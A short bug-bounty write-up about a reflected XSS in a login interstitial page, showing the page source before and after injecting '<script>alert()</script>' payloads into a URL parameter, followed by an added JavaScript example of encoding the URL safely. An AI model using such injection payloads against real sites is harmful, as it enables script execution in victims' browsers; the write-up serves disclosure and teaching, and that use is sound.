Easiest Reflected XSS Ever

3 years ago 172

Catmane

Hello guys, that was my first bug in a random program: a reflected XSS, which was very easy to find.
First I checked the website, example.com, and it was using an anti-bot protection.

So I took a look at the page source and it showed this:

<html>
<script async src='/cdn-cgi/bm/cv/669835187/api.js'></script>
<body>
<script>function login() { document.cookie="BPC=347afd52f4f4682a435f4a2f37a06739";document.location.href="https://*/_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All&attempt=1";}</script>
<input type="submit" value="LOGIN" onclick="login();">
<script type="text/javascript">(function(){window['__CF$cv$params']={r:'6695b8958f172c9d',m:'34de24589dc33d306835eb1753ae5d77e1a783ec-1625374104-1800-AeChI8OcP9+n+sA0S5lR5yHBKS5BbXqNJvXORZNTFKYb34JkwF/wvZ2cc1o+/UYnOyDaEETC60bJ4Hx8DTtSDIrqNx6/znWhrcalBxIYSVEKfBJP0WdE4IUaK+1h991z37EtYfnKJTcsY2tVRB4RKUG70l62Xf9NvDzwe4bprEPTZLfkszXOzmaU6dBwkjoKuvcoyoZLUCyevY7XuYO7gqwS51zzFBl97sC5wVCUoJx3T9gHSlMQdW6RTZ/iwlk8ZD37CANEG2/sJpqvZNJ6CCgtedZVwKX8h72LYd8OwMMGMmq1aFVCbxXB8kutP4DPZjQ2lu005NLxOGFbYBYPlgA=',s:[0xf1ad95421c,0xc5adde3371],}})();</script>
</body>
</html>

So it was so easy for me to put the payload like this:

<html>
<script async src='/cdn-cgi/bm/cv/669835187/api.js'></script>
<body>
<script>function login() { document.cookie="BPC=347afd52f4f4682a435f4a2f37a06739";document.location.href="https://*/_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All<script>alert(12345)</script> z<script>alert(1234)</script>
&attempt=1";}</script>
<input type="submit" value="LOGIN" onclick="login();">
<script type="text/javascript">(function(){window['__CF$cv$params']={r:'6695b8958f172c9d',m:'34de24589dc33d306835eb1753ae5d77e1a783ec-1625374104-1800-AeChI8OcP9+n+sA0S5lR5yHBKS5BbXqNJvXORZNTFKYb34JkwF/wvZ2cc1o+/UYnOyDaEETC60bJ4Hx8DTtSDIrqNx6/znWhrcalBxIYSVEKfBJP0WdE4IUaK+1h991z37EtYfnKJTcsY2tVRB4RKUG70l62Xf9NvDzwe4bprEPTZLfkszXOzmaU6dBwkjoKuvcoyoZLUCyevY7XuYO7gqwS51zzFBl97sC5wVCUoJx3T9gHSlMQdW6RTZ/iwlk8ZD37CANEG2/sJpqvZNJ6CCgtedZVwKX8h72LYd8OwMMGMmq1aFVCbxXB8kutP4DPZjQ2lu005NLxOGFbYBYPlgA=',s:[0xf1ad95421c,0xc5adde3371],}})();</script>
</body>
</html>

And BOOM:

“the XSS triggered”

They awarded me 500$ for this!! So I tried to go deeper and I found more XSS vulnerabilities in their website, and I earned an easy 2000$ with them.

Thanks for reading.
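
The fix for the pattern in the page source above, as an added example that is not code from the original post or from the affected site: the vulnerable way of writing a request URL into the inline `login()` script, next to a version that encodes it for the script context. It assumes the interstitial page builds that script from the requested URL; the function names and the `site.example` host are hypothetical.

```javascript
// Added example; all function names and the site.example host are hypothetical.
// Assumption: the server copies the requested URL into an inline <script>
// string, as the page source in the write-up suggests.

// Constructed request URL carrying the markup shown in the write-up.
const SAMPLE_URL = 'https://site.example/_layouts/scriptresx.ashx?sections=All' +
  '<script>alert(12345)</script> z<script>alert(1234)</script>&attempt=1';

// Vulnerable pattern: raw concatenation into a JS string inside <script>.
function renderUnsafe(targetUrl) {
  return '<script>function login() { document.location.href="' +
    targetUrl + '";}</script>';
}

// Encode a value as a JS string literal that is also inert to the HTML parser.
// JSON.stringify escapes quotes and backslashes; the replace step removes the
// characters that could end the script element or a line (<, >, &, U+2028/9).
function jsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened pattern: same page, but the URL goes through jsString().
function renderSafe(targetUrl) {
  return '<script>function login() { document.location.href=' +
    jsString(targetUrl) + ';}</script>';
}

// Simplified model of the HTML tokenizer: a script element ends at the first
// "</script>" regardless of JS quoting. Returns the body of each element.
function scriptBodies(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

console.log('unsafe:', scriptBodies(renderUnsafe(SAMPLE_URL)).length, 'script elements');
console.log('safe:  ', scriptBodies(renderSafe(SAMPLE_URL)).length, 'script element');
```

The same rule applies wherever request data lands inside an inline script; HTML body and attribute contexts need their own encoders.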
